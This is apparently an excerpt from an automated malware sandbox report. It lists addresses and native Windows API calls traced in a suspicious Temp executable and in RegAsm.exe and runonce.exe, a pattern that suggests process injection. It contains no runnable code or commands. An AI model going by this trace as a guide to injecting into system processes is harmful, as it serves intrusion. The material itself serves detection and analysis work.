                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92CC0 NtQueryVirtualMemory,7_2_02B92CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92C00 NtQueryInformationProcess,7_2_02B92C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92C60 NtCreateKey,7_2_02B92C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92DB0 NtEnumerateKey,7_2_02B92DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92DD0 NtDelayExecution,7_2_02B92DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92D30 NtUnmapViewOfSection,7_2_02B92D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92D10 NtMapViewOfSection,7_2_02B92D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B93D10 NtOpenProcessToken,7_2_02B93D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92D00 NtSetInformationFile,7_2_02B92D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B93D70 NtOpenThread,7_2_02B93D70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C135C0 NtCreateMutant,LdrInitializeThunk,10_2_04C135C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C14650 NtSuspendThread,LdrInitializeThunk,10_2_04C14650
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C14340 NtSetContextThread,LdrInitializeThunk,10_2_04C14340
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_04C12CA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12C60 NtCreateKey,LdrInitializeThunk,10_2_04C12C60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04C12C70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12DD0 NtDelayExecution,LdrInitializeThunk,10_2_04C12DD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_04C12DF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12D10 NtMapViewOfSection,LdrInitializeThunk,10_2_04C12D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_04C12D30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12EE0 NtQueueApcThread,LdrInitializeThunk,10_2_04C12EE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_04C12E80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12FE0 NtCreateFile,LdrInitializeThunk,10_2_04C12FE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12FB0 NtResumeThread,LdrInitializeThunk,10_2_04C12FB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12F30 NtCreateSection,LdrInitializeThunk,10_2_04C12F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C139B0 NtGetContextThread,LdrInitializeThunk,10_2_04C139B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12AD0 NtReadFile,LdrInitializeThunk,10_2_04C12AD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12AF0 NtWriteFile,LdrInitializeThunk,10_2_04C12AF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12BE0 NtQueryValueKey,LdrInitializeThunk,10_2_04C12BE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04C12BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_04C12BA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12B60 NtClose,LdrInitializeThunk,10_2_04C12B60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C13090 NtSetValueKey,10_2_04C13090
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C13010 NtOpenDirectoryObject,10_2_04C13010
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12CC0 NtQueryVirtualMemory,10_2_04C12CC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12CF0 NtOpenProcess,10_2_04C12CF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12C00 NtQueryInformationProcess,10_2_04C12C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12DB0 NtEnumerateKey,10_2_04C12DB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C13D70 NtOpenThread,10_2_04C13D70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12D00 NtSetInformationFile,10_2_04C12D00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C13D10 NtOpenProcessToken,10_2_04C13D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12EA0 NtAdjustPrivilegesToken,10_2_04C12EA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12E30 NtWriteVirtualMemory,10_2_04C12E30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12F90 NtProtectVirtualMemory,10_2_04C12F90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12FA0 NtQuerySection,10_2_04C12FA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12F60 NtCreateProcessEx,10_2_04C12F60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12AB0 NtWaitForSingleObject,10_2_04C12AB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C12B80 NtQueryInformationFile,10_2_04C12B80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AE9510 NtCreateFile,10_2_00AE9510
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AE9680 NtReadFile,10_2_00AE9680
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AE9780 NtDeleteFile,10_2_00AE9780
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AE9820 NtClose,10_2_00AE9820
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AE9980 NtAllocateVirtualMemory,10_2_00AE9980
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_048EF2CF NtReadVirtualMemory,10_2_048EF2CF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_048EF8C4 NtMapViewOfSection,10_2_048EF8C4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_00B529206_2_00B52920
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_00B50A906_2_00B50A90
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_00B521386_2_00B52138
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_00B50A7F6_2_00B50A7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004188F37_2_004188F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004030007_2_00403000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004100CA7_2_004100CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042F0D37_2_0042F0D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004100D37_2_004100D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004012407_2_00401240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E2E37_2_0040E2E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004102F37_2_004102F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416AFE7_2_00416AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416B037_2_00416B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004024627_2_00402462
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004024707_2_00402470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E47C7_2_0040E47C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E4277_2_0040E427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E4337_2_0040E433
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004027507_2_00402750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B652A07_2_02B652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C012ED7_2_02C012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B2C07_2_02B7B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C002747_2_02C00274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BA739A7_2_02BA739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C203E67_2_02C203E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E3F07_2_02B6E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1A3527_2_02C1A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1132D7_2_02C1132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4D34C7_2_02B4D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0F0CC7_2_02C0F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1F0E07_2_02C1F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C170E97_2_02C170E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C07_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6B1B07_2_02B6B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C181CC7_2_02C181CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C201AA7_2_02C201AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BFA1187_2_02BFA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C2B16B7_2_02C2B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B501007_2_02B50100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F1727_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B9516C7_2_02B9516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C116CC7_2_02C116CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7C6E07_2_02B7C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1F7B07_2_02C1F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5C7C07_2_02B5C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B607707_2_02B60770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B847507_2_02B84750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0E4F67_2_02C0E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C124467_2_02C12446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B514607_2_02B51460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1F43F7_2_02C1F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BFD5B07_2_02BFD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C205917_2_02C20591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B605357_2_02B60535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C175717_2_02C17571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0DAC67_2_02C0DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BFDAAC7_2_02BFDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BA5AA07_2_02BA5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5EA807_2_02B5EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C17A467_2_02C17A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1FA497_2_02C1FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD3A6C7_2_02BD3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C16BD77_2_02C16BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7FB807_2_02B7FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B9DBF97_2_02B9DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1AB407_2_02C1AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1FB767_2_02C1FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B468B87_2_02B468B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8E8F07_2_02B8E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B638E07_2_02B638E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B628407_2_02B62840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6A8407_2_02B6A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B629A07_2_02B629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C2A9A67_2_02C2A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B769627_2_02B76962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B699507_2_02B69950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B9507_2_02B7B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B69EB07_2_02B69EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1EEDB7_2_02C1EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B72E907_2_02B72E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1CE937_2_02C1CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1EE267_2_02C1EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60E597_2_02B60E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61F927_2_02B61F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6CFE07_2_02B6CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1FFB17_2_02C1FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B52FC87_2_02B52FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B80F307_2_02B80F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BA2F287_2_02BA2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1FF097_2_02C1FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD4F407_2_02BD4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1FCF27_2_02C1FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B50CF27_2_02B50CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C00CB57_2_02C00CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD9C327_2_02BD9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B60C007_2_02B60C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B78DBF7_2_02B78DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5ADE07_2_02B5ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7FDC07_2_02B7FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C11D5A7_2_02C11D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C17D737_2_02C17D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6AD007_2_02B6AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B63D407_2_02B63D40
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505DD029_2_0505DD02
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505DD609_2_0505DD60
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505FD709_2_0505FD70
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0506657B9_2_0506657B
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_050665809_2_05066580
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505DEA49_2_0505DEA4
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505DEB09_2_0505DEB0
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505DEF99_2_0505DEF9
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505FB479_2_0505FB47
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505FB509_2_0505FB50
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0507EB509_2_0507EB50
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0506836F9_2_0506836F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C8E4F610_2_04C8E4F6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9244610_2_04C92446
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BD146010_2_04BD1460
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9F43F10_2_04C9F43F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04CA059110_2_04CA0591
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C7D5B010_2_04C7D5B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE053510_2_04BE0535
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9757110_2_04C97571
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C916CC10_2_04C916CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BFC6E010_2_04BFC6E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9F7B010_2_04C9F7B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BDC7C010_2_04BDC7C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C0475010_2_04C04750
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE077010_2_04BE0770
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C8F0CC10_2_04C8F0CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C970E910_2_04C970E9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9F0E010_2_04C9F0E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE70C010_2_04BE70C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C981CC10_2_04C981CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BEB1B010_2_04BEB1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04CA01AA10_2_04CA01AA
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04CAB16B10_2_04CAB16B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C1516C10_2_04C1516C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BD010010_2_04BD0100
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BCF17210_2_04BCF172
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C7A11810_2_04C7A118
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE52A010_2_04BE52A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C812ED10_2_04C812ED
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BFB2C010_2_04BFB2C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C8027410_2_04C80274
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04CA03E610_2_04CA03E6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BEE3F010_2_04BEE3F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C2739A10_2_04C2739A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9A35210_2_04C9A352
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9132D10_2_04C9132D
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BCD34C10_2_04BCD34C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9FCF210_2_04C9FCF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BD0CF210_2_04BD0CF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C80CB510_2_04C80CB5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE0C0010_2_04BE0C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C59C3210_2_04C59C32
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BF8DBF10_2_04BF8DBF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BDADE010_2_04BDADE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BFFDC010_2_04BFFDC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C91D5A10_2_04C91D5A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C97D7310_2_04C97D73
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BEAD0010_2_04BEAD00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE3D4010_2_04BE3D40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE9EB010_2_04BE9EB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9EEDB10_2_04C9EEDB
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BF2E9010_2_04BF2E90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9CE9310_2_04C9CE93
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE0E5910_2_04BE0E59
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9EE2610_2_04C9EE26
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE1F9210_2_04BE1F92
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BECFE010_2_04BECFE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BD2FC810_2_04BD2FC8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9FFB110_2_04C9FFB1
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C54F4010_2_04C54F40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9FF0910_2_04C9FF09
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C22F2810_2_04C22F28
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C00F3010_2_04C00F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BC68B810_2_04BC68B8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C0E8F010_2_04C0E8F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE38E010_2_04BE38E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C4D80010_2_04C4D800
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BEA84010_2_04BEA840
